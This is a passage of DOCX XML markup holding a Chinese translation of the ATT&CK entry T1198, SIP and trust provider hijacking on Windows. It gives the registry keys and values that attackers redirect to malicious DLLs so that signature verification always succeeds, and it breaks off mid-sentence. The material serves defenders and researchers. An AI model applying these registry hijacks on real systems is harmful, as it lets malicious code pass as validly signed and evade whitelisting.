      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E782E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SIP</w:t>
      </w:r>
      <w:r w:rsidRPr="003E782E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和信任提供商劫持</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="7771B795" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54B928BC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DD4D6D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t xml:space="preserve"> T1198</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E5C8ECF" w14:textId="11331F47" w:rsidR="000F2665" w:rsidRPr="00DD4D6D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御逃逸</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FDF853A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DD4D6D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D06B65E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DD4D6D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t>系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="658F2C1B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DD4D6D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> API</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控，应用日志，动态链接库监控，加载的动态链接库，进程监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注册表，</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>事件日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="409C0098" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DD4D6D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>绕过的防御</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00015EEF">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用白名单、</w:t>
            </w:r>
            <w:r w:rsidRPr="00015EEF">
              <w:t>Autoruns</w:t>
            </w:r>
            <w:r w:rsidRPr="00015EEF">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>分析、数字证书验证、进程白名单</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00754C8F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户模式签名验证</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BCF9991" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DD4D6D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t>: Matt Graeber, @mattifestation, SpecterOps</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26431B0E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="609CC49D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="792FB40B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>在用户模式下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>身份验证器</w:t>
      </w:r>
      <w:hyperlink r:id="rId77" w:tgtFrame="_blank" w:history="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>数字签名用于验证文件的来源和完整性，这些变量可用于在签名代码中建立信任（例如：具有有效</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Microsoft </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>签名的驱动程序可以作为安全处理）。签名验证过程通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> WinVerifyTrust </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>应用程序编程接口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>函数进行处理，该函数接受查询，并与负责验证的相应信任提供程序进行协调签名的参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361AF140" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>由于可执行文件类型和相应的签名格式各不相同，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>创建了名为主题接口包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>SIP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）的软件组件，以在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>函数和文件之间提供抽象层。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">SP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>负责使</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>函数能够创建、检索、计算和验证签名。对于大多数文件格式（可执行、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>、安装程序等）存在唯一的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> SIP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>，目录签名提供了全部功能，并由全局唯一标识符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>GUID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>标识。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A5E36A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71123811" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2891">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>代码签名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>类似，攻击者可能会滥用此体系结构来破坏信任控制，并绕过仅允许合法签名的代码在系统上执行的安全策略。攻击者可能会劫持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> SIP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>和信任提供程序组件，误导操作系统和白名单工具，将恶意（或任何）代码根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>以下标准</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>分类为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FDC6DB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005450B1" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKLM\SOFTWARE[\WOW6432Node]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg{{SIP_GUID}}</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下修改</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>Dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>FuncName</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:t>值</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:cs="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，指向动态链接提供</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:t xml:space="preserve"> SIP </w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:cs="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:t xml:space="preserve"> CryptSIPDllGet </w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:cs="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据数据</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:t>Msg</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:cs="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的库</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:cs="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:t>DLL</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:cs="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），该函数从签名文件中检索编码的数字证书。通过指向具有导出函数的恶意制作的</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:t xml:space="preserve"> DLL</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:cs="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，该函数始终返回已知良好的签名值（例如：用于可移植可执行文件的</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:t xml:space="preserve"> Microsoft </w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:cs="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>签名），而不是文件的实际签名，攻击者可以使用该</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:t xml:space="preserve"> SIP </w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:cs="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的文件应用可接受的签名值（尽管可能会发生哈希不匹配，但签名无效，因为函数返回的哈希值与从文件中计算的值不匹配）</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC2A1F1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005450B1" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKLM\SOFTWARE[WOW6432Node]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData{{SIP_GUID}}</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>Dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>FuncName</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:t>值</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，指向</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:t>DLL</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:t xml:space="preserve">SIP </w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:t xml:space="preserve"> CryptSIPDll </w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验证间接数据函数，该函数根据签名哈希值验证文件的计算哈希值。通过指向具有始终返回</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:t xml:space="preserve"> TRUE </w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的导出函数的恶意制作的</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:t xml:space="preserve"> DLL</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（指示验证成功），攻击者可以使用该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SIP</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功验证任何文件（具有合法签名）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。（</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无论是否劫持前面</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>提到的</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:t xml:space="preserve"> CryptSIPDllGet </w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:t>Msg</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。此注册表值还可以从已存在的</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:t xml:space="preserve"> DLL </w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重定向到适当的导出函数，从而避免在磁盘上删除和执行新文件的要求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CB60FD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005450B1" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKLM\SOFTWARE[WOW6432Node]Microsoft\Cryptography\Providers\Trust\FinalPolicy{{trust provider GUID}}</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>Function</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表值，指向提供信任的</w:t>
